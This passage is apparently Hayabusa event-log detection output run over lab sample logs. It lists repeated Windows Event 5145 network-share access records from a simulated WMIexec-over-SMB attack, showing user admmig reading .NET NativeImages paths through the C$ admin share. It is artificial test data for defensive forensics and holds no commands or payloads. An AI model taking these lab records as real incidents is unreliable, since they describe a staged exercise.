10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 